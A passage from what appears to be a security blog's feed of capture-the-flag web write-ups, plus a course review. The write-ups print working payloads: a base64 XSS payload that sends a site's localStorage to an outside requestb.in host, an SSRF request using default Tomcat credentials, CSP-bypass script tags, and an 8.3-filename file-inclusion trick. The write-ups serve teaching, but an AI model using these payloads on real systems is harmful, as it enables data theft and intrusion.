<span class="o">+</span> <span class="nx">value</span><span class="p">;</span> <span class="nx">request</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">'</span><span class="s1">GET</span><span class="dl">'</span><span class="p">,</span> <span class="nx">url</span><span class="p">,</span> <span class="kc">false</span><span class="p">);</span> <span class="nx">request</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span> <span class="p">}</span> <span class="o">&lt;</span><span class="sr">/script&gt;</span></code></pre></figure> <p>Ofcourse sending the highligted javascript just like that would mess up the payload as some characters are blocked, filtered or escaped. So the best way to send the data is to base64 encode it and then do a <code class="language-plaintext highlighter-rouge">document.write(base64_decode(payload))</code>.</p> <p>So I created a new user with username <code class="language-plaintext highlighter-rouge">lol&lt;BODY ONLOAD=document.write(atob('BASE64 encoded payload'));&gt;lol</code> and then I created an html file on my server which simply submits this credentials to the challenge server which redirects the bot to the XSS vulnerable response and our payload will execute !</p> <p>So I created an html file on my server with the following contents:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="o">&lt;</span><span class="nx">html</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">body</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">form</span> <span class="nx">name</span><span class="o">=</span><span class="dl">"</span><span class="s2">myForm</span><span class="dl">"</span> <span class="nx">id</span><span class="o">=</span><span class="dl">"</span><span class="s2">myForm</span><span class="dl">"</span> <span class="nx">action</span><span class="o">=</span><span class="dl">"</span><span class="s2">https://ssc.teaser.insomnihack.ch/api/user.php</span><span class="dl">"</span> <span class="nx">method</span><span class="o">=</span><span class="dl">"</span><span class="s2">POST</span><span class="dl">"</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">input</span> <span class="nx">name</span><span class="o">=</span><span class="dl">"</span><span class="s2">action</span><span class="dl">"</span> <span class="nx">value</span><span class="o">=</span><span class="dl">"</span><span class="s2">login</span><span class="dl">"</span> <span class="o">/&gt;</span> <span class="o">&lt;</span><span class="nx">input</span> <span class="nx">name</span><span class="o">=</span><span class="dl">"</span><span class="s2">name</span><span class="dl">"</span> <span class="nx">value</span><span class="o">=</span><span class="dl">""</span> <span class="o">/&gt;</span> <span class="o">&lt;</span><span class="nx">input</span> <span class="nx">name</span><span class="o">=</span><span class="dl">"</span><span class="s2">password</span><span class="dl">"</span> <span class="nx">value</span><span class="o">=</span><span class="dl">""</span> <span class="o">/&gt;</span> <span class="o">&lt;</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="dl">"</span><span class="s2">submit</span><span class="dl">"</span> <span class="nx">value</span><span class="o">=</span><span class="dl">"</span><span class="s2">Submit</span><span class="dl">"</span> <span class="o">/&gt;</span> <span class="o">&lt;</span><span class="sr">/form</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">myForm</span><span class="p">.</span><span class="nx">name</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">lol&lt;BODY ONLOAD=document.write(atob('PHNjcmlwdD4NCmZvcih2YXIgaT0wLCBsZW49bG9jYWxTdG9yYWdlLmxlbmd0aDsgaTxsZW47IGkrKykgew0KdmFyIGtleSA9IGxvY2FsU3RvcmFnZS5rZXkoaSk7DQp2YXIgdmFsdWUgPSBsb2NhbFN0b3JhZ2Vba2V5XTsNCnZhciByZXF1ZXN0ID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7DQp2YXIgdXJsID0gJ2h0dHBzOi8vcmVxdWVzdGIuaW4vcWF0OW9rcWE/a2V5PScgKyBrZXkgKyAnJnZhbHVlPScgKyB2YWx1ZTsNCnJlcXVlc3Qub3BlbignR0VUJywgdXJsLCBmYWxzZSk7DQpyZXF1ZXN0LnNlbmQoKTsNCn0NCjwvc2NyaXB0Pg=='));&gt;lol</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">myForm</span><span class="p">.</span><span class="nx">password</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">lol</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">myForm</span><span class="p">.</span><span class="nx">submit</span><span class="p">();</span> <span class="o">&lt;</span><span class="sr">/script</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="sr">/body</span><span class="err">&gt; </span><span class="o">&lt;</span><span class="sr">/html&gt;</span></code></pre></figure> <p>So everything we need is complete right now and one last thing we need to do is to steal the flag:</p> <ol> <li> <p>Connect to the port <code class="language-plaintext highlighter-rouge">25</code> where the smtp service is running, send an email along with the link to the above HTML file.</p> </li> <li> <p>When the bot parses the HTML file, it automatically sends the login request to the <code class="language-plaintext highlighter-rouge">/api/user.php</code> with an already registered username (along with XSS payload) and a password.</p> </li> <li> <p>It redirects the bot to <code class="language-plaintext highlighter-rouge">/api/user.php?action=getUser</code> which contains the username reflected along with the XSS payload and it executes on the context of the site.</p> </li> <li> <p>The executed javascript will help us get the contents of the <code class="language-plaintext highlighter-rouge">localStorage</code> and helps us exfiltrate it using XMLHttpRequest().</p> </li> <li> <p>The first value inside the <code class="language-plaintext highlighter-rouge">localStorage</code> is the flag that we need :)</p> </li> </ol> <h2 id="references">References</h2> <ol> <li> <p><a href="http://www.linuxjournal.com/content/sending-email-netcat">Sending email with Netcat</a></p> </li> <li> <p><a href="https://blog.0daylabs.com/2014/09/13/ajax-everything-you-should-know-about-xmlhttprequest">Everything you need to know about XMLHttpRequest()</a></p> </li> </ol> Sun, 22 Jan 2017 00:00:00 -0800 https://blog.0daylabs.com/2017/01/22/the-greate-escape-insomnihack-teaser-ctf/ https://blog.0daylabs.com/2017/01/22/the-greate-escape-insomnihack-teaser-ctf/ ctf Exploiting internal tomcat server with SSRF - Insomnihack teaser 2017 Web 50 writeup <h2 id="introduction">Introduction</h2> <p>After a break I started participating in CTFs again (The new year resolution was to participate in every single CTFs this year, lets see.. :P) and this year’s first CTF was Insomnihack teaser. The CTF was overall good and I guess most of the teams enjoyed playing it. So here is the writeup of Web 50:</p> <h2 id="challenge-description">Challenge Description:</h2> <blockquote> <p>Normal, regular cats are so 2000 and late, I decided to buy this allegedly smart tomcat robot Now the damn thing has attacked me and flew away. I can’t even seem to track it down on the broken search interface… Can you help me ?</p> <p><a href="http://smarttomcat.teaser.insomnihack.ch">Search interface</a></p> </blockquote> <p>We are given a search interface in which we can enter the co-ordinates (latitude and longitude) and it searches for the missing cat. I decided to see how the parameters are getting send using burp and the results were interesting !</p> <p>There is a parameter named <code class="language-plaintext highlighter-rouge">u</code> with the following value <code class="language-plaintext highlighter-rouge">http://localhost:8080/index.jsp?x=1&amp;y=1</code> when we enter <code class="language-plaintext highlighter-rouge">1</code> for both search values. This looks quite interesting so the first thing that came to my mind was RFI (Remote File Inclusion). Althrough I tried several methods to get code execution via RFI, it all failed so I decided to check the question from a different angle.</p> <p>The name of the challenge is <code class="language-plaintext highlighter-rouge">smart tomcat</code> so there has to be something related to tomcat. So I tried to access an invalid page in the server which responded me back with the tomcat standard error page with version number (7.0.68) but that didn’t really lead me anywhere.</p> <h2 id="solution">Solution</h2> <p>The next best thing to check is sensitive directories within tomcat and a quick Googling told me there is a tomcat manager usually on <code class="language-plaintext highlighter-rouge">/manager</code> path on the server. So lets try visit the same with <code class="language-plaintext highlighter-rouge">u=http://localhost:8080/manager</code> but unfortunately it was protected with HTTP basic authentication and we are not given any credentials ! After all this is a 50 point problem so it had to have the default credentials isn’t it ?</p> <p>So lets try logging in with the default tomcat credentials which is <code class="language-plaintext highlighter-rouge">tomcat:tomcat</code> but how do we send the credentials ? We don’t have direct access to the server (that is we can visit it only via the <code class="language-plaintext highlighter-rouge">u</code> parameter and a direct access to it over browser URL was blocked) but we do can send the HTTP basic credentials over the URL itself in a standard format.</p> <p>So finally, when we send <code class="language-plaintext highlighter-rouge">u=http://tomcat:tomcat@localhost:8080/manager/html</code> it prints out the flag ! You can also do the same thing with curl: <code class="language-plaintext highlighter-rouge">curl -d "u=http://tomcat:tomcat@localhost:8080/manager/html" http://smarttomcat.teaser.insomnihack.ch/</code></p> <h2 id="references">References</h2> <p>1) <a href="https://github.com/psmiraglia/ctf/blob/master/kevgir/001-tomcat.md">https://github.com/psmiraglia/ctf/blob/master/kevgir/001-tomcat.md</a></p> Sun, 22 Jan 2017 00:00:00 -0800 https://blog.0daylabs.com/2017/01/22/smart-tomcat/ https://blog.0daylabs.com/2017/01/22/smart-tomcat/ ctf eLearnSecurity Practical Web Defense (eWDP) course review <h2 id="introduction">Introduction</h2> <p>As a CTF-lover, I always like attacking web applications more than patching the vulnerabilities within it. But patching vulnerabilities correctly without affecting the functionality of the application is indeed an important skill, which is why I decided to take a look at the <a href="https://www.elearnsecurity.com/course/practical_web_defense/">eLearnSecurity’s Practical Web Defense</a> course.</p> <p>The course is designed by Abraham Aranguren, who is the project leader of <a href="https://www.owasp.org/index.php/OWASP_OWTF">OWASP OWTF</a>. Back in 2014 I was lucky enough to get selected for Google Summer of Code (<strong>GSoC</strong>) as a part of OWTF, which is when Abe (Abraham) gave me free access to the <strong>elite version</strong> of PWD course (Thanks Abe !). Initially I didn’t get much time to concentrate on the course but last 2 months (Yes, after 2 years), I got enough free time so I went back and looked into the course materials (which was absolutely awesome !).</p> <h2 id="pre-requisites">Pre-requisites</h2> <p>The course starts from absolute basics so I think there is no need of any pre-requisites. If you know a bit of <code class="language-plaintext highlighter-rouge">PHP</code> (or created a basic website with PHP before), that is all is required to learn this course (provided you work hard during the course).</p> <h2 id="course">Course</h2> <p>The course starts with basic tool introductions (like ZAP, OWTF) and goes through a vareity of modules which essentially contains both exploiting and patching almost all basic web application vulnerabilities. There are 16 modules in total which convers almost everything in OWASP top 10. Each module has:</p> <ol> <li> <p><strong>Slides</strong>: which explains all the theory needed to understand an attack and to patch it as well.</p> </li> <li> <p><strong>Videos</strong>: which are very eloborate and clearly explains every single lab exercises (some are upto 3 hours length and over 25 hours of video series !).</p> </li> <li> <p><strong>PDFs</strong> (Available only for elite version): You can download theory in PDF format, the study materials are now portable !</p> </li> <li> <p><strong>Labs</strong>: All modules have assosiative labs in which a completely vulnerable web application is given and our aim is to find vulnerabilities, exploit it and patch all the vulnerabilities without affecting the functionality of the application.</p> </li> </ol> <p>To be frank, labs are the awesome part of the course. In most of the other courses, we will simply learn to attack and exploit an applications but this is not complete learning. What about patching or defending the application from these vulnerabilities ? This is the part were eWDP has its uniqueness ! It not only teach you to find and exploit the vulnerabilities but also explains how to patch it according to different contexts (which is very important to learn and fun too ;) )!</p> <h2 id="hera-labs">Hera Labs:</h2> <p>Each module has its own <code class="language-plaintext highlighter-rouge">Hera Lab</code> which is where most of the learning happens. The video labs focus on finding out and patching most of the critical vulnerabilities but there are always <strong>extra miles</strong> which we are supposed to solve by ourselves (for the complete learning.) Note that solving extra miles is actually not necessary but it’s highly recommended because submitting the extra miles will give you additional points which can help you pass the final exam more easily.</p> <p>Each lab comes with a lab module PDF which has complete intended solutions for all main exercieses (ofcourse extra miles is not included, we should try it ourselves) so that once solved, we can cross check our solution with the intended one (more learning !).</p> <h2 id="exam">Exam</h2> <p>Exam has 2 parts:</p> <ol> <li> <p><strong>Multiple Choice Questions (MCQ)</strong>:</p> <p>The first part has around 50 MCQs which are a bit tricky. You need to score a minimum of (75%) to go to the next level of exam. Make sure you start the exam only after you have gone through the course properly (including all videos and slides), otherwise you will waste your exam voucher (failing to get 75%, you have to buy a new exam voucher again to write the exam).</p> </li> <li> <p><strong>Practical exam</strong>:</p> <p>This is much more interesting than the MCQs. Here you are given an intentionally vulnerable application which has a lot of vulnerabilities (yes a lot !). We are given 3 seperate directories namely <strong><code class="language-plaintext highlighter-rouge">vulnerable</code></strong>, <strong><code class="language-plaintext highlighter-rouge">fixed</code></strong> and <strong><code class="language-plaintext highlighter-rouge">virtually_patched</code></strong> each having the same application files initially. Our objectives are to:</p> <ol> <li> <p>Find and exploit all the vulnerabilities and demonstrate the POC using the <code class="language-plaintext highlighter-rouge">vulnerable</code> directory.</p> </li> <li> <p>Patch all the vulnerabilities we exploited in the <code class="language-plaintext highlighter-rouge">fixed</code> (You have the permission to modify the code only on this directory) and make sure that vulnerabilities are patched in such a way that functionalitiy of the application remains untouched !</p> </li> <li> <p>Write <code class="language-plaintext highlighter-rouge">ModSecurity</code> rules to patch all the vulnerabilities we found in the <code class="language-plaintext highlighter-rouge">virtually_patched</code> directory. Here you are not suppose to edit the vulnerable code but should patch all the vulnerabilities by writing ModSecurity rules to block them.</p> </li> </ol> </li> </ol> <p>We have 14 days to complete the final exam and upload the files as a tar ball and then wait for the result. I had to wait for more than a month to get the result, but yeah the course was totally worth it.</p> <h2 id="conclusion">Conclusion</h2> <p>As you have seen from the review, <strong><code class="language-plaintext highlighter-rouge">eWDP</code></strong> is a course with a difference. You are not only learning how to exploit the application but also learning to patch the vulnerabilities and block the attacks using ModSecurity (Virtual Patches) which can be considered as a more complete learning !</p> <p>For people who want to take this course, if you are interested in learning the defensive side, then this course will really help you lay down your basics. Even as a pentester you need to know how to secure your web applications so that you can recommend secure coding practices to your clients to fix the vulnerabilities you found. So without a doubt, I would strongly recommend this course for people who really want to learn both sides of Web Apllication Pentesting :)</p> <h2 id="references">References</h2> <ol> <li><a href="https://www.elearnsecurity.com/certification/ewdp/">eLearnSecurity Web Defense Professional</a></li> <li><a href="https://www.elearnsecurity.com/collateral/Syllabus_PWD.pdf">Practical Web Defense course syllabus</a></li> </ol> Mon, 19 Sep 2016 00:00:00 -0700 https://blog.0daylabs.com/2016/09/19/elearnsecurity-practical-web-defense/ https://blog.0daylabs.com/2016/09/19/elearnsecurity-practical-web-defense/ ctf Bypassing path restriction on whitelisted CDNs to circumvent CSP protections - SECT CTF Web 400 writeup <h2 id="introduction">Introduction</h2> <p>So it all started when I was casually browsing twitter and noticed a tweet from <a href="https://twitter.com/avlidienbrunn">@avlidienbrunn</a>:</p> <blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">Made some CTF challenges for <a href="https://twitter.com/SEC_T_org">@SEC_T_org</a> CTF at <a href="https://t.co/wEwrgeLEic">https://t.co/wEwrgeLEic</a> check it out if you have spare time :) <a href="https://twitter.com/hashtag/ctf?src=hash">#ctf</a> <a href="https://twitter.com/hashtag/web?src=hash">#web</a> <a href="https://twitter.com/hashtag/pwn?src=hash">#pwn</a></p>&mdash; ­Mathias Karlsson (@avlidienbrunn) <a href="https://twitter.com/avlidienbrunn/status/773789219613503488">September 8, 2016</a></blockquote> <script async="" src="//platform.twitter.com/widgets.js" charset="utf-8"></script> <p>Ok, so there is a CTF going on (which was not listed on CTFtime.org) and since avlidienbrunn created the web challenges, I decided to take a look because I was sure that the challenges would be really good. And it turns out that I was not mistaken. Indeed great challenges :)</p> <h2 id="challenge">Challenge:</h2> <p>I was able to solve some quick XSS challengs but then I came across a challenge which was vulnerable to Reflected XSS but is protected by CSP:</p> <p>Challenge URL: <a href="http://xss3.sect.ctf.rocks/?xss=stuff">http://xss3.sect.ctf.rocks/?xss=stuff</a></p> <p>A quick injection revealed that there was no filter and whatever we inject is simply echoed back at the end of the response. But an XSS is not possible (as of now) because the CSP blocks it. The CSP header looks like this:</p> <p><code class="language-plaintext highlighter-rouge">Content-Security-Policy: default-src 'none'; style-src 'self'; img-src 'self'; script-src https://cdnjs.cloudflare.com/ajax/libs/jquery/</code></p> <p>So we can see that <code class="language-plaintext highlighter-rouge">cdnjs</code> is actually whitelisted CDN, which means we can load any files from that server. But this was not as easy as I thought it would be. If we could import outdated Angularjs from the server, we could use it to execute JavaScript but what is the use of importing <code class="language-plaintext highlighter-rouge">jquery</code> ? The main issues I faced here were:</p> <p>1) Importing <code class="language-plaintext highlighter-rouge">jquery</code> was useless because we could import a vulnerable version of <code class="language-plaintext highlighter-rouge">jquery</code> from the server but what is the use if we cannot add our own jquery code into the DOM after this import ?</p> <p>2) Since the URL in the CSP contains the path (<code class="language-plaintext highlighter-rouge">/ajax/libs/jquery/</code>), I didn’t know any possible way to load other files like Angularjs from the same server (which resides on <code class="language-plaintext highlighter-rouge">/ajax/libs/angular.js/</code>) which could have made our work much easier.</p> <h2 id="solution">Solution:</h2> <p>Since loading <code class="language-plaintext highlighter-rouge">jquery</code> is useless, the only way is to somehow import outdated Angularjs from the server, so I started trying path traversal so that I can try loading from other directories. I literally fuzzed the application until it gave an interesting response. Typical injections like <code class="language-plaintext highlighter-rouge">../</code> and <code class="language-plaintext highlighter-rouge">..%2f</code> didn’t work but, to my surprise, double encoding worked ! HELL YEAH !</p> <p>So when we try to load <code class="language-plaintext highlighter-rouge">&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/..%252fangular.js/1.0.8/angular.js"&gt;&lt;/script&gt;</code>, firefox loaded the old version of Angularjs properly for me ! I never knew that double encoding could bypass CSP protections on whitelisted CDN path !</p> <p>Cool, so now we can load Angularjs and outdated versions of it can actually help us in bypassing the CSP with <code class="language-plaintext highlighter-rouge">ng-onclick</code> instead of javascript event handlers (Thanks to <a href="https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22">Mario Heiderich</a>). So using this, I successfully created a payload which can execute <code class="language-plaintext highlighter-rouge">alert(1)</code> but with a minor problem. It actually needs a small user interaction i.e, a click from the user. But this will not be accepted as a solution because final payload should run without user interaction.</p> <p>Payload: <code class="language-plaintext highlighter-rouge">?xss=&lt;body class="ng-app"ng-csp ng-click=$event.view.alert(1337)&gt;&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/..%252fangular.js/1.0.8/angular.js"&gt;&lt;/script&gt;</code></p> <p>Now things became really difficult. So I decided to visit <a href="https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22">mario’s challenge</a> again to see how people actually solved the challenge with payload without user interaction and one of them looked really cool:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="dl">"</span><span class="s2">ng-app ng-csp&gt; &lt;base href=//ajax.googleapis.com/ajax/libs/&gt; &lt;script src=angularjs/1.0.1/angular.js&gt;&lt;/script&gt; &lt;script src=prototype/1.7.2.0/prototype.js&gt;&lt;/script&gt;{{$on.curry.call().alert(1337</span></code></pre></figure> <p>So if we can also load the <code class="language-plaintext highlighter-rouge">prototype.js</code>, we can use <code class="language-plaintext highlighter-rouge">curry</code> property along with the <code class="language-plaintext highlighter-rouge">call()</code> which returns us a <code class="language-plaintext highlighter-rouge">window</code> object and inturn use it to call our little <code class="language-plaintext highlighter-rouge">alert(1)</code> without any user interaction !</p> <p>So here goes the final payload:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="o">&lt;</span><span class="nx">script</span> <span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">https://cdnjs.cloudflare.com/ajax/libs/jquery/..%252fprototype/1.7.2/prototype.js</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/script</span><span class="err">&gt; </span><span class="o">&lt;</span><span class="nx">script</span> <span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">https://cdnjs.cloudflare.com/ajax/libs/jquery/..%252fangular.js/1.0.1/angular.js</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/script</span><span class="err">&gt; </span><span class="o">&lt;</span><span class="nx">div</span> <span class="nx">ng</span><span class="o">-</span><span class="nx">app</span> <span class="nx">ng</span><span class="o">-</span><span class="nx">csp</span><span class="o">&gt;</span> <span class="p">{{</span><span class="nx">$on</span><span class="p">.</span><span class="nx">curry</span><span class="p">.</span><span class="nx">call</span><span class="p">().</span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)}}</span> <span class="o">&lt;</span><span class="sr">/div&gt;</span></code></pre></figure> <p>This was indeed a great challenge from <a href="https://twitter.com/avlidienbrunn">@avlidienbrunn</a>. I throughly enjoyed playing the CTF :)</p> <h2 id="references">References:</h2> <p>These are some of the awesome references you can use to learn more about similar challenges:</p> <ol> <li><a href="https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22">Shit, it’s CSP!</a></li> </ol> Fri, 09 Sep 2016 00:00:00 -0700 https://blog.0daylabs.com/2016/09/09/bypassing-csp/ https://blog.0daylabs.com/2016/09/09/bypassing-csp/ ctf Abusing file inclusions using Windows 8.3 filename legacy shortcodes - MMACTF Rotten Uploader web 150 writeup <h2 id="introduction">Introduction</h2> <p>Rotten Uploader was a good challenge but it took a good amount of time to solve it despite being as easy challenge (ofcourse its easy once you know how to do it :P). So here is the challenge description:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Find the secret file. http://rup.chal.ctf.westerns.tokyo/ Hint1 (2016/09/04 16:31) The files/directories on the DOCUMENT_ROOT are below four. download.php file_list.php index.php uploads(directory) The number of files in the DOCUMENT_ROOT/uploads is 5. The directory have "index.html". You don't need scan tools. </code></pre></div></div> <h2 id="challenge">Challenge</h2> <p>We are presented with a site which can be used to download 3 files namely <code class="language-plaintext highlighter-rouge">test.cpp</code>, <code class="language-plaintext highlighter-rouge">test.rb</code> and <code class="language-plaintext highlighter-rouge">test.c</code>. The download happens through a file named <code class="language-plaintext highlighter-rouge">download.php</code>:</p> <p><a href="http://rup.chal.ctf.westerns.tokyo/download.php?f=test.cpp">http://rup.chal.ctf.westerns.tokyo/download.php?f=test.cpp</a></p> <p>The first thing that comes to our mind after seeing the URL is to test for Local File Inclusion (LFI) and indeed it was vulnerable to LFI ! So lets download the source code of <code class="language-plaintext highlighter-rouge">download.php</code>.</p> <p>File: <code class="language-plaintext highlighter-rouge">download.php</code></p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="nb">header</span><span class="p">(</span><span class="s2">"Content-Type: application/octet-stream"</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="nb">stripos</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'f'</span><span class="p">],</span> <span class="s1">'file_list'</span><span class="p">)</span> <span class="o">!==</span> <span class="kc">FALSE</span><span class="p">)</span> <span class="k">die</span><span class="p">();</span> <span class="nb">readfile</span><span class="p">(</span><span class="s1">'uploads/'</span> <span class="mf">.</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'f'</span><span class="p">]);</span> <span class="c1">// safe_dir is enabled.</span> <span class="cp">?&gt;</span></code></pre></figure> <p>and index.php.</p> <p>File: <code class="language-plaintext highlighter-rouge">index.php</code></p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="cd">/** * */</span> <span class="k">include</span><span class="p">(</span><span class="s1">'file_list.php'</span><span class="p">);</span> <span class="cp">?&gt;</span> <span class="cp">&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0 Level 2//EN"&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;title&gt;</span>Uploader<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Simple Uploader<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;p&gt;</span>There are no upload features.<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;h3&gt;</span>Files<span class="nt">&lt;/h3&gt;</span> <span class="nt">&lt;table</span> <span class="na">width=</span><span class="s">"100%"</span> <span class="na">border=</span><span class="s">"1"</span><span class="nt">&gt;</span> <span class="nt">&lt;tr&gt;</span> <span class="nt">&lt;th&gt;</span>#<span class="nt">&lt;/th&gt;</span> <span class="nt">&lt;th&gt;</span>Filename<span class="nt">&lt;/th&gt;</span> <span class="nt">&lt;th&gt;</span>Size<span class="nt">&lt;/th&gt;</span> <span class="nt">&lt;th&gt;</span>Link<span class="nt">&lt;/th&gt;</span> <span class="nt">&lt;/tr&gt;</span> <span class="cp">&lt;?php</span> <span class="k">foreach</span><span class="p">(</span><span class="nv">$files</span> <span class="k">as</span> <span class="nv">$file</span><span class="p">)</span><span class="o">:</span> <span class="cp">?&gt;</span> <span class="cp">&lt;?php</span> <span class="k">if</span><span class="p">(</span><span class="nv">$file</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="k">continue</span><span class="p">;</span> <span class="c1">// visible flag ?&gt; </span> <span class="o">&lt;</span><span class="n">tr</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="n">td</span><span class="o">&gt;&lt;?=</span> <span class="nv">$file</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span> <span class="cp">?&gt;</span><span class="nt">&lt;/td&gt;</span> <span class="nt">&lt;td&gt;</span><span class="cp">&lt;?=</span> <span class="nv">$file</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> <span class="cp">?&gt;</span><span class="nt">&lt;/td&gt;</span> <span class="nt">&lt;td&gt;</span><span class="cp">&lt;?=</span> <span class="nv">$file</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span> <span class="cp">?&gt;</span> bytes<span class="nt">&lt;/td&gt;</span> <span class="nt">&lt;td&gt;&lt;a</span> <span class="na">href=</span><span class="s">"download.php?f=</span><span class="cp">&lt;?=</span> <span class="nv">$file</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span> <span class="cp">?&gt;</span><span class="s">"</span><span class="nt">&gt;</span>Download<span class="nt">&lt;/a&gt;&lt;/td&gt;</span> <span class="nt">&lt;/tr&gt;</span> <span class="cp">&lt;?php</span> <span class="k">endforeach</span><span class="p">;</span><span class="cp">?&gt;</span> <span class="nt">&lt;/table&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span></code></pre></figure> <p>Till now we understood the following points:</p> <p>1) The <code class="language-plaintext highlighter-rouge">uploads/</code> directory has 5 files in which 4 are known to us. So the 5th file (whose name we don’t know yet) has to be the flag.</p> <p>2) If we know the filename, we can download it via <code class="language-plaintext highlighter-rouge">download.php</code>. The only possible way to know the filename is to get the <code class="language-plaintext highlighter-rouge">file_list.php</code> which will contain the list of all files.</p> <p>3) The string <code class="language-plaintext highlighter-rouge">file_list</code> has been blocked by an <code class="language-plaintext highlighter-rouge">stripos()</code> function check which is cannot be bypassed easily (as <code class="language-plaintext highlighter-rouge">stripos()</code> don’t have any known bypasses).</p> <h2 id="solution">Solution:</h2> <p>It took a while to understand that the server is running windows. So the question arises, why do they configure the challenge on a windows machine while all others are on linux (Linux is usually prefered for web servers)? Then we came across a legacy windows feature called <a href="https://en.wikipedia.org/wiki/8.3_filename"><code class="language-plaintext highlighter-rouge">Windows 8.3 filename</code></a> and that lead us to the bypass !</p> <p>So computing the filename, we can use <code class="language-plaintext highlighter-rouge">file_l~1.php</code> so the file can be download by sending the following request:<code class="language-plaintext highlighter-rouge">download.php?f=../file_l~1.php</code> and this got us the source code of <code class="language-plaintext highlighter-rouge">file_list.php</code></p> <p>File: <code class="language-plaintext highlighter-rouge">file_list.php</code></p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="nv">$files</span> <span class="o">=</span> <span class="p">[</span> <span class="p">[</span><span class="kc">FALSE</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="s1">'test.cpp'</span><span class="p">,</span> <span class="mi">1135</span><span class="p">,</span> <span class="s1">'test.cpp'</span><span class="p">],</span> <span class="p">[</span><span class="kc">FALSE</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="s1">'test.c'</span><span class="p">,</span> <span class="mi">74</span><span class="p">,</span> <span class="s1">'test.c'</span><span class="p">],</span> <span class="p">[</span><span class="kc">TRUE</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="s1">'flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7'</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="s1">'flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7'</span><span class="p">],</span> <span class="p">[</span><span class="kc">FALSE</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="s1">'test.rb'</span><span class="p">,</span> <span class="mi">1446</span><span class="p">,</span> <span class="s1">'test.rb'</span><span class="p">],</span> <span class="p">];</span></code></pre></figure> <p>So now we know the filename in which flag is present and hence we can download it using the LFI: <code class="language-plaintext highlighter-rouge">download.php?f=flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7</code></p> <h2 id="references">References</h2> <p>1) <a href="https://en.wikipedia.org/wiki/8.3_filename">Windows 8.3 filename</a></p> Tue, 06 Sep 2016 00:00:00 -0700 https://blog.0daylabs.com/2016/09/06/using-windows-shortfilename-feature-lfi/ https://blog.0daylabs.com/2016/09/06/using-windows-shortfilename-feature-lfi/ ctf MongoDB - Extracting data (admin password) using NoSQL Injection - MMACTF 2016 Web 100 writeup <h2 id="introduction">Introduction</h2> <p>MMACTF 2015 was indeed a great learning experience, so I made sure that I took part in it this year. Last year, there were some really great challenges like “<a href="/2015/09/07/mmactf-web300-challenge-writeup/">Local File inclusion + File Upload = Remote Code execution</a>” and “<a href="/2015/09/07/mmact-web-100-challenge/">Executing php using script tags</a>”. Both of them were real learning experience.</p> <h2 id="challenge">Challenge</h2> <p>So this year I started again, hoping that it would be fun just like the last year and fortunately it was ! So lets go ahead and solve web 100. We were given a login page and a sample account <code class="language-plaintext highlighter-rouge">test:test</code> to login. I tried logging in and it simply says “You are logged in as test”. Our aim is to login as admin. So the only possible injection place is the login page.</p> <p>Challenge URL: <a 